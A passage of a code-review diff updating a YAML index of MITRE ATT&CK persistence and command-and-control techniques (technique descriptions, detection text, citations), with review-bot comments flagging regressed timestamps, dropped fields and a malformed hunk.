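Review bot: the `+ x_mitre_detection:` text for T1546.017 names only three rule directories while the `+ description:` above it lists five; `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/` are equally valid rule locations, so a file-modification monitor built from the detection string alone would miss them. Suggest listing all five in the detection text, wrapping `/usr/lib/udev/rules.d/` in backticks like its neighbours, and removing the trailing space before the closing quote in `2024) '`; the `x_mitre_contributors` list also mixes a double-quoted `"@grahamhelton3"` with bare scalars, which is harmless YAML but inconsistent with the surrounding entries.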
@@ -36420,7 +36855,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
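Review bot: the `modified` timestamp for T1546.007 moves backwards here (`2022-05-11` to `2022-04-20`), and the same regression appears for T1556.004 (`2022-05-11` to `2021-12-14`), T1574.004 (`2023-10-31` to `2023-03-30`), T1574.012 (`2022-04-25` to `2021-08-30`) and T1205.002 (`2022-11-08` to `2022-10-20`); if these are resyncs to the upstream STIX values, the commit message should say so, because any consumer that sorts or diffs on `modified` will now treat these objects as older than the previously published copies.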
@@ -36444,51 +36879,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36511,20 +36906,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
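Review bot: the `- x_mitre_permissions_required:` block (`Administrator`, `SYSTEM`, `root`) is removed from T1505.001 and nothing in the hunk carries that requirement forward, while the `description` and `x_mitre_detection` lines are left unchanged; the same happens for `- User` in the T1568.002 hunk below. If this follows the upstream deprecation of the field, state that in the commit message; otherwise the privilege requirement should be retained, since it is the one line that tells a defender the technique needs elevated database or OS rights.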
@@ -36554,7 +36986,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36578,12 +37010,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
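Review bot: the two removals at the top of this hunk drop both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1556.004 with no replacement visible, whereas the T1546.007 hunk keeps its `x_mitre_attack_spec_version: 2.1.0` as context; the same double removal appears for T1574.012 in the `@@ -36812` hunk. Unless the key is re-added higher in each object outside the hunk, these two techniques end up with no ATT&CK spec version at all while every other object in the change has one.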
@@ -36667,11 +37097,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36723,9 +37152,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36774,7 +37202,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36812,14 +37240,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36882,7 +37308,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36940,97 +37365,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
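Review bot: the `Akamai DGA Mitigation` reference in this hunk changes its `+ url:` from blogs.akamai.com to a personal `medium.com/@yvyuz` post while the description and `Retrieved February 18, 2019` date are kept verbatim; confirm it is the same article, and if so update the retrieval date the way the NetSPI entries in the T1505.001 hunk do (`Retrieved September 12, 2024`) when their URLs changed, or prefer an archived copy of the original Akamai page so the source name still matches the host.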
@@ -37096,9 +37519,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
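Review bot: the new T1071.005 description contains four lines with no `+` prefix (`, XMPP`, `,`, `, and STOMP`, `use a publish/subscribe design,`), so as shown this hunk is malformed: a patch tool would treat them as context lines that do not exist in the old file and refuse to apply. It looks like inline markup around the protocol names was stripped when the diff was rendered. Re-emit the sentence as one `+` string, e.g. `+ client and server. \n\nProtocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design,`. Two smaller points in the same object: `x_mitre_detection: ''` ships empty for a brand-new technique, and the `wailing crab sub/pub` citation ends its author list with a double period (`Metrick, Kat..`). The `misues` spelling inside that URL is the upstream path and should be left alone.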
@@ -37144,7 +37625,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
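Review bot: `spec_version: '2.1'` is deleted here (and from every other object touched in this file) with nothing replacing it. In STIX 2.1 `spec_version` is a required property on each object, so if this index is ever converted back into a STIX bundle the exporter must reinstate it. If the intent is that the index keeps only ATT&CK `x_mitre_*` properties and drops STIX-only keys, that is fine, but say so in the commit message so the next regeneration does not reintroduce it.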
@@ -37176,7 +37656,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
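Review bot: `modified` for Fast Flux DNS moves backwards, `2021-04-29T14:49:39.188Z` → `2020-03-27T16:10:37.183Z`. The removed value shares the `.188Z` suffix with the other removed timestamps in this file (`2022-05-11T14:00:00.188Z`, `2022-11-08T14:00:00.188Z`, and so on), which suggests the old index carried release-batch stamps and the new values are the object-level timestamps from the source bundle. That is plausibly correct, but because several consumers diff on `modified`, confirm the bundle this was regenerated from is the intended ATT&CK release before merging a change that makes ten objects look reverted.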
@@ -37198,22 +37678,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37235,7 +37713,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37260,7 +37738,6 @@ command-and-control:
